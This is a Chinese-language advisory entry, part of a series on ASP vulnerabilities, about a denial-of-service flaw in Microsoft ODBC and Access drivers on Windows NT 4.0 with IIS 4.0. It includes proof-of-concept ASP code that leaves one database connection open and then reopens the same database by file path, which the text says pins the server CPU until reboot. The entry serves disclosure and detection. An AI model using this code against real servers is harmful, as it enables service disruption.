|
|
ASP漏洞分析和解决方法(6)
18、MS ODBC数据库连接溢出导致NT/9x拒绝服务攻击 漏 洞 描 述: Microsoft ODBC数据库在连接和断开时可能存在潜在的溢出问题(Microsoft ACCESS数据库相关)。 如果不取消连接而直接和第二个数据库相连接,可能导致服务停止。 影响系统: ODBC 版本: 3.510.3711.0 ODBC Access驱动版本: 3.51.1029.00 OS 版本: Windows NT 4.0 Service Pack 5, IIS 4.0 (i386) Microsoft Office 97 Professional (MSO97.dll: 8.0.0.3507) 漏洞检测方法如下: ODBC 连接源名称: miscdb ODBC 数据库型号: MS Access ODBC 假设路径: d:\data\misc.mdb ASP代码如下: <% set connVB = server.createobject("ADODB.Connection") connVB.open "DRIVER={Microsoft Access Driver (*.mdb)}; DSN=miscdb" %> <html> <body> ...lots of html removed... <!-- We Connect to DB1 --> <% set connGlobal = server.createobject("ADODB.Connection") connGlobal.Open "DSN=miscdb;User=sa" mSQL = "arb SQL Statement" set rsGlobal = connGlobal.execute(mSQL) While not rsGlobal.eof Response.Write rsGlobal("resultfrommiscdb") rsGlobal.movenext wend 'rsGlobal.close 'set rsGlobal = nothing 'connGlobal.close 'set connGlobal = nothing ' Note we do NOT close the connection %> <!-- Call the same database by means of DBQ direct file access --> <% set connGlobal = server.createobject("ADODB.Connection") connGlobal.Open "DRIVER={Microsoft Access Driver (*.mdb)}; DBQ=d:\data\misc.mdb" mSQL = "arb SQL Statement" set rsGlobal = connGlobal.execute(mSQL) While not rsGlobal.eof Response.Write rsGlobal("resultfrommiscdb") rsGlobal.movenext wend rsGlobal.close set rsGlobal = nothing connGlobal.close set connGlobal = nothing ' Note we DO close the connection %> 在这种情况下,IIS处理进程将会停顿,CPU使用率由于inetinfo.exe进程将达到100%。只有重新启动计算机才能恢复。 |
|||||||||||||||||||